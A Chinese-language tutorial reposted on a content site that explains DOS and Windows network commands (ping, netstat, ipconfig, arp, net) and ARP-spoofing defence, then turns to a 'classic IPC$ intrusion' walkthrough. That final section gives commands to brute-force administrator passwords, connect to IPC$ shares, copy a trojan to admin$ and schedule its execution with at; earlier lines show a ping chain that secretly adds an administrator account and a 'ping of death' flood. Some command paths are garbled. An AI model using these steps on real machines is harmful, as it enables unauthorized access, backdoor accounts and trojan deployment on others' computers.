DOS简介 dos系统怎么装xp

  DOS简介



哈哈,小小娱乐一下@@河南一区 萧邦007 技术交流!!!

DOS是英语中Disk OrerationSystem(磁盘操作系统)的缩写,其实DOS的版本有很多,比如MS-DOS、FreeDOS、PC_DOS等,正在我们常用的是MS_DOS(MS是Microsoft的缩写)

.exe的文件叫可执行文件

.com的文件叫命令文件

.bat的文件叫批处理文件

如果要执行这些文件,只需在提示符下敲入文件基本名后回车即可,不需输入文件后缀。如果具有相同的名字,其根据优先级,以次是.com、.exe .bat .cmd

1.0 DOS的启动方法

1.开始——运行CMD(或者command)

2.开始——程序——附件——命令提示符

3.新建批处理法

第二课 Ping命令介绍及使用方法

1.1什么是Ping命令

Ping是个使用频率极高的实用程序,用于确定本地主机是否能与另一台主机交换(发送与接收)数据包。根据返回的的信息,我们就可以推断TCP/IP参数是否设置得正确以及运行是否正常。需要注意的是:成功的与另一台主机进行一次再次数据包交换并不表示TCP/IP配置就是正确的,我们必须执行大量的本地主机与远程主机的数据包交换,才能确信TCP/IP的正确性。

简单的说,Ping就是一个测试程序,如果Ping运行正确,我们大体上就可以排除网络访问层、网卡、MODEM的输入输出线路、电缆和路由器等存在的故障,从而减小了问题的范围。但由于可以自定义所发数据包的大小扩无何止的调整发送同,Ping也被某些加别的用心的人作为DDOS(拒绝服务攻击)的工具,例如许多大型的网站就是被黑客利用数百台可以接入互联网的电脑连续发送大量Ping数据包而瘫痪的。

1.2通过Ping检测网络故障

Ping 127.0.0.1

这个Ping 命令被送到本地计算机的IP软,该命令永不退出该计算机。如果没有做到这一点,就表示TCP/IP的安装或运行存在某些最基本的问题。

Ping本机IP

这个命令被送到我们计算机所配置的IP地址,我们 的计算机始终都应该对该Ping命令作出应答,如果没有,则表示本地配置或安装存在问题。出现此问题时,局域网用户请断开网络电缆,然后重新发送该命令。如果网线断开后本命令命令正确,则表示另一台计算机可能配置了相同的IP地址。

Ping局域网内其他IP

这个命令应该离开我们的计算机,经过网卡及网络电缆到达其他计算机,再返回。收到回送应答表明本地网络中的网卡和载体运行正确。

但如果收到0个回送应答,那么表示子网掩码(进行子网掩码分割时,将IP地址的网络部分与主机部分分开的代码)不正确或网卡配置错误或者电缆系统有问题。

Ping网关IP 如Ping 192.168.1.1

这个命令如果应答正确,表示局域网中网关路由器正在运行并能作出应答。

Ping远程IP 如:Ping www.163.com

如果收到4个应答,表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet(但不排除ISP的DNS会有问题)。

Ping localhot

localhost是操作系统的网络保留名,它是127.0.0.1的别名,每台计算机都应该能够将该名字转换成该地址。如果没有做到这,则表示主机文件(/Windows/host)中存在问题。

Ping www.XXX.com(如www.163.com)

对这个域名执行Ping www.XXX.com地址,通常是通过DNS服务器,如果这里出现故障,则表示DNS服务器的IP地址配置不正确或DNS服务器有故障(对于拨号上网用户,某些ISP已经不需要设置DNS服务器了)。

注意:我们也可以利用该命令实现域名对IP地址的转换功能。

注意:如上所列的所有Ping命令都 能正常运行,那么 我们 对自己的计算机进行本地和远程的功能基本上就可以放心了。但是,这些命令的成功并不表示 我们 所有的网络配置都 没有问题,例如,某些子网掩码错误无法用这些方法检测到。

1.3Ping命令常用参数说明

Ping IP -t

连续对IP地址执行Ping 命令,直到被用户以Ctrl+C中断。

Ping IP -l 3000

指定Ping命令中的数据长度为3000字节,而不是缺省的32字节。

Ping IP -n 4

执行特定次数的Ping命令。默认的是4次。

1.4Ping命令用途作业讲解

1用来检测网络是否通畅。命令为Ping www.hack58.com

2.可以将域名转换成IP。如Ping www.hack58,com【222.152.42.54】with 32bytes of data:也就是说www.hack58.com的IP为222.152.42.54

3.可根据Ping返回的TTL值来判断对方所使用的操作系统。

TTL=32 Windows 9X/Me

TTL=64 LINUX

TTL=128 Windows 200X/xp

TTL=255 Unix

但是这个值还是绝对的,可以修改。

4.Ping 命令用来延时,用来指定一程序或命令在指定时候内执行。比如:Ping 127.0.0.1 -n &net cnsst cnsst /add &net localgroup administrators cnsst /add

这条命令的意思是Ping 127.0.0.1 5次后添加用户cnsst并提升为管理员组。

5.Ping还可以用来进行DDOS攻击,比如:死亡之Ping命令为:Ping 127.0.0.1 -l 65500 -t

6.其它功能。比如:

·可以判断数据包经过多少路由

·可以检测服务器的丢包率 lost=0 (0% loss)

·可以检测某个时间服务器断网或是重启过

·可以检测自己的网络什么时间断过

·可以检测对方是否设置了一系列的安全策略或禁Ping设置

Netstat命令介绍及使用技巧

Netstat用于显示与Ip、TCP、UDP和ICMP协议相关的统计数据,一般用于检验本机各端口的网络连接情况。

2.0 Netstat一些常用的选项

netstat -s

本选项能够按照各个协议分别显示其统计数据。 如果我们的应用程序(台Web浏览器)运行速度比较慢,或者不能显示Web页之类的数据,那么我们就可以用本选项查看一下所显示的信息。我们需要仔细查看统计数据的各行,找到出错的关键字,进而确定问题所在。

netstat -e

本选项用于显示关于民太网的统计数据。它列出的包括传送的数据包的总字节数、错误数、删除数、数据包的数量和广播数量。这些统计数据既有发送的数据包数量,也接收的数据包数量。这个选项可以用来统计基本的网络流量。

netstat -r

本选项可以显示关于路由器的信息,类似于后面所讲使用route print命令时看到的信息。除了显示有效路由外, 还显示当前有效的连接。

netstat -a

本选项显示一个所有的有效连接信息列表,包括已建立的连接(ESTABLISHED),包括监听连接请求(LISTENNING)的那些连接。

netstat -n

显示所有已建立的有效连接。

2.1 Netstat的妙用

经常上网的人,一般都用QQ,当被一些人骚扰,相投诉以不知从何下手?我们只要知道对方的IP,就可以向他所属的ISP投诉了。但怎样才能通过QQ知道对方的IP呢?其实,我们只需要通过Netstat就可以很方便的做到这一点;当他通过与我们连接时(他给我们发一条信息或给他发一条信息),立刻在DOS命令提示符下输入netstat -n或netstat -a就可以看到对方上网时所用的IP或ISP域名了,甚至连所用Port都完全暴露了。

第四课 IPconfig命令介绍及使用技巧

ipconfig

当使用IPconfig时不带任何参数选项,那么它为每个已经配置了接口显示IP地址、子我掩码和缺省网关值。

ipconfig /all

本地IP地址、子网掩码、网关、DNS等; 还可以显示内置于本地网卡中的物理地址(MAC);如果IP地址是从DHCP服务器租用的,IPconfig将显示HDHCP服务器的IP地址和租用地址预计失效的日期。

ARP(地址转换协议)介绍使用技巧

arp -a 或-g

用于查看高速缓存中的所有项目。-a和-g 参数的结果是一样的,-g一直是UNIX平台上用来显示ARP高速缓存中所有项目的选项,而Windows用的是arp -a (-a 可被为all),但它也可以接受比较传统的-g选项。

arp -a IP

如果我们有多个网卡,那么使用arp -a 加上接口的IP地址,就可以只显示与该接口相关的ARP缓存项目。

arp -s IP 物理地址

我们可以向ARP高速缓存中人工输入一个静态项目。该项目在计算机引导过程中将保持有效状态,或者出现错误时,人工配置的物理地址将自动更新该项目。

arp -d

使用本命令能够人式删除所有缓存信息;当遭到arp欺骗时。

arp -d IP

使用本命令能够删除一个静态项目

ARP病毒简介

现在局域网中感染ARP病毒的情况比较多, 清理和防范都比较困难,给不秒的网络管理员造成了很多的困扰。

那么如何应对ARP病毒及防范措施。

ARP病毒的症状

有时候无法正常上网,有时候好了,包括 访问网卡邻居也是如此,拷贝文件无法完成,出现错误;局域网内的ARP包爆增,使用ARP查询的时候会发现不正常的MAC地址,或者错误的MAC地址对,还有就是一个MAC地址对应多个IP的情况也会 有出现。

ARP攻击的原理:

ARP欺骗攻击的包一般有以下两个特点,满足之一可视为攻击包报警:第一以太网数据包头的源地址、目标地址和ARP数据包的协议地址不匹配。或者,ARP数据包的发送和目标地址不在自己网络网卡MAC数据库内,或者与自己网络MAC数据库Mac/IP不匹配。这些统统第一时间报警,查这些数据包(以太网数据包)的源地址(也可能伪造),说法大致知道那台机器在发起攻击了。现在有网络管理工具比如网络执法官、P2P终结者也会使用同样方式来伪装成网关,欺骗客户端对网关访问,也就是会获取到网关的流量,从而实现网络管理和网络监控等 功能,同时也会对网络管理带来潜在的危害,就是可以很容易的获取用户的密码等相关信息。

1.0

ARP病毒的处理有如下几种方法

手工处理方法:

1、 每次打开电脑之后,首先检测电脑网络是否正常,如果不正常,可以网络连接的属性中点击“修复”。(每次修复之后网络都会正常一段时间)

2、在网络正常的情况下,点击“开始”——运行——cmd

3 输入arp -a

若出现No ARP Enrties Found 说明网关没有疏通,Ping 192.168.1.1 就行了

4.记录一下自己网关ip地址所对应的物理地址(有时候出现多条记录,只需记录自己的网关的。)如,我的网关ip 地址是198.168.1.1,所对应的物理地址是00-0a-eb-ff-64.

5.记录好之后,继续提示符下面输入 “arp -a 网关的IP 地址对应的物地址”,本例中为"arp -a 192.168.1.1 00-0a- eb-e6-ff-64",回车。

批处理法:

我们可以把手工处理法做成一个批处理。

注册表法:

辑一具注册表项值,键值如下:Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMindowsCurrentVersionRun]“mac”=“arp -s 网关IP Mac地址”

然后保存成.Reg文件以后在每个客户端上点击导入注册表。

预防措施:

1.及时升级客户端的操作系统和应用程序补丁;

2.安装和更新杀毒软件。

3.如果网络规模较少,尽量使用手动指定IP设置,而不是使用DHCP来分配IP地址。

4.如果交换机支持,在交换机上绑定MAC地址与IP地址。(不过这个实在不是好主意!)

Net命令详解及使用技巧

1.1 Net命令简介

NET命令是一个命令行命令,Net命令有很多函数用于

实用和核查计算机之间的NetBIOS连接,可以查看我们的管理网络环境、服务、用户、登陆等信息内容。

要想获得Net的 HELP可以

(1)在Windows下可以用图形的方式,开始>帮助>索引>输入NET

(2)在COMMAND 下可以用字符方式:NET /?或NET HELP取得相应的方法的帮助。所有Net命令接受选项/yes和/no

1.2 Net命令参数使用技巧

1、 Net View

作用:显示域列表、计算机列表或指定计算机的共享资源列表。

命令格式: Net view [\computername |/domain[:domainname]]

有关参数说明:

键入不带参数的Net view 显示当前域的计算机列表

\computernamae 指定 要查看其共享资源的计算机

/domain[:domainname]指定要相看其可用计算机的域

例如:Net vie \GHQ 查看GHQ计算机的共享资源列表。

Net view /domain:XZY 查看XZY域中的机器列表。

2.Net User

作用:添加或更改用户帐号或显示用户帐号信息。

命令格式:net user [username [password |*] [option]] [/domain]

有关不带参数的Net user 查看计算机上的用户帐号列表

如:net user cheng 123 /add

3.Net use

作用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。

命令格式:

有关参数说明:

键入不带参数的Net use 列出网络连接

4.Net Time

作用:使计算机的时钟与另一台计算机或域的时间两步。

5.net start

作用:启动服务,或显示已启动服务的列表。

DOS简介 dos系统怎么装xp
命令格式:net start 服务的名称

6.net Pause 服务名称

暂停正在运行的服务

7. Net Continue 服务名称

重新激活挂起的服务

8.net stop 服务名称

停止Windows网络服务

控制面板——管理工具—服务

9.Net Statistics

作用:显示本地工作或服务器的统计记录。

键入不带参数的net statistics 列出其统计信息可用的运行服务。

10.Net Share

作用:创建、删除或显示共享资源

11.net send

作用:向网络的其他用户、计算机或通信名发送消息。

前提是要打开message服务:

管理工具——服务——message

如:“net send 192.168.1.45

要发送的内容”可向在同局域网中任何一台机器发送信息。

第七课 其它DOS命令综合介绍

cd 返回根目录

cd.. 返回上一级目录

copy 拷贝文件

del 删除文件

tree 显示驱动器或路径的文件夹结构

dir 列文件名

format 格式化磁盘

md 建立目录

type 显示文件内容

rd 删除目录

ren 改变谁的文件名

cls 清屏

基于DOS命令的IPC简单入侵演示

1.1什么是ipc$

IPC$是共享"命名管道"的资源,它是为了让进程间而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。

注意事项:

1.IPC连接是WindowsNT及以上系统中特有的远程网络登陆功能,其功能相当于Unix中的Telent,由于IPC$功能需要用到WindowsNT中的很多DLL函数,所以不能在Windowxs9X中运行。

2.即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接

3.并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表。

1.2 建立ipc$连接的危害

访问部分共享,如果你能够以某个具有一定权限的用户身份登陆的话,那么你就会得到相应有权限 ;

为获取上目标信息、管理瞟进程和服务,上传木马半运行;如果是2000server,还可以考虑开启终端服务方便控制。

1.3 ipc$ 关系网

1.ipc$g与空连接:

不需要用户名与密码的ipc$连接即为空连接,一旦你某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了。

2.ipc$与139、445端口:

SMB(ServerMessageBlock) Windows协议族,用于文件和打印共享服务。

NBT(NetBIOS over TCP/IP)使用137(UDP),138(UDP)and 139(TCP)来实现基于TCP/IPr NETBIOS网际互联。

ipc$连接可以实现远程登陆及对默认共享的访问。一般情况下,我们可以通过139、445(win2000)端口实现对共享文件/打印机的访问,ipc$连接是需要139或445端口来支持的。

3. ipc$ 与默认共享

默认共享是为了管理员远程管理而默认开启的共享(当然可以关闭它),即即所有的逻辑盘(c$ d$ e$....)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)。

1.4 ipc$连接失败的原因

1.你的系统不是NT或以上操作系统;

2.对方没有打开默认ipc$默认共享;

3.对方未开启139或445(或被防火墙屏蔽);

4.你的命令输入有误(比如缺少了空格等);

5.用户名或密码错误;

可以根据返回的错误号分析原因:

错误号:5,拒绝访问:很可能低价使用的用户不是管理员权限的,先提升权限;

错误号:51 ,Windows无法找到网络路径:

网络有问题;

错误号53,找不到网络路径:IP地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);

错误号67,找不到网络名:你的lanmanworkstation服务未启动;目标删除了ipc$;

1.5 如何打开目标ipc$

首先获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telent、木马,当然,这shell必有是admin权限的,然后你可以使用shell执行命令net share ipc$ 来开放目标的ipc$。

从上面可以知道,ipc$能否使用还有很多条件。请确认相关服务都已经运行,没有就启动它(通过net 命令),还是不行的话。(比如有防火墙)建议放弃。

1.6经典入侵模式

相关命令:

1.建立空连接:

net use \IPipc$ "" /user:""(一定要注意:这一行命令中包括了三个空格)

2.建立非空连接:

net use \IPipc$"密码" /user:"用户名"(同样有三个空格)

3. 映射默认共享:

net use z :\IPc$ "密码" /user:"用户名"(即可将对方的c 盘映射为自己怕z盘,其他盘类推)

如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \IPc$

4.删除一个ipc$连接

net use \ipipc$ /del

5.删除共享映射

net use c: /del 删除映射的C盘,其盘类推

net use * /del 删除全部,会有提示要求按Y确认。

经典入侵模式

第一步:扫描目标IP段,尝试建立空连接,猜解administrator的密码。这一过程费时费力,建议使用流光X-Scan扫描,挂字典猜解密码。

第二步:打开cmd输入:

C:>net use \127.0.0.1IPC$ "123" /user:"administrator"

下面用到一些工具在流光Tools中,也可以用其他的工具,大同小异。

复制木马程序到目标机器:

c:>copy as.exe \127.0.0.1admin$

(admin$是指admin用户的c:winsystem32还可以使用c$ d$ 意思是C盘与D盘,)

如:

c:>copy 木马.exe \10.114.10.145$

c:>net time \127.0.0.1 //查询对方计算机的时间

如 net time \10.112.15.146

接下来:

C:>at \10.112.15.146 13:45 c:木马.exe

c:> at \10.112.15.146

  

爱华网本文地址 » http://www.413yy.cn/a/25101014/205977.html

更多阅读

xp系统怎么定时关机 xp如何设置定时关机

xp系统怎么定时关机——简介 下载软件或玩游戏挂机的电脑爱好者来说经常太晚睡觉,以是平常事情了,又想挂到2点在关机或者下载完成在关机,那怎么才做的到呢!那就是电脑自带的定时关机了。自己可以设置开机或者关机。例如我每天晚上24点就

XP系统快速进入DOS系统方法汇总 xp如何进入dos系统

XP系统快速进入DOS系统方法汇总。平常操作电脑我们很少用到DOS系统,所以对其也会比较少去了解,但是有时候也会用得到的地方,DOS做为微软公司在个人计算机上使用的一个操作系统载体,推出了多个版本。可以直接操纵管理硬盘的文件,以DO

dos命令怎么删除文件 怎么进入dos命令

dos命令怎么删除文件——简介dos命令是我们好多朋友,不是很了解的东西,dos命令是一种面向磁盘的操作命令,今天教大家用dos命令删除文件和文件夹,dos命令怎么删除文件——工具/原料dos命令dos命令怎么删除文件——方法/步骤dos命令怎么

下载的系统怎么装 win8精简版

下载的系统怎么装——简介下载的系统一般是一个ISO的镜像文件,所以一般情况下是下载一个镜像文件读取软件(虚拟光驱),通常使用的虚拟光驱软件是Daemon Tools(精灵虚拟光驱)。其实现在的解压软件已经可以直接解压ISO镜像文件,所以直接解压这

Win7系统下怎么安装xp系统 win7装win7双系统

Win7系统下怎么安装xp系统——简介win7在界面上比xp美观的多,同时使用方面也在某些方面比xp更为实用,更为方便。可是对于游戏 和某些应用程序的兼容性上却就不及xp了,所以越来越多的人选择配置win7和xp双系统 。可是由於windows 操作

声明:《DOS简介 dos系统怎么装xp》为网友梦魇绽荼蘼分享!如侵犯到您的合法权益请联系我们删除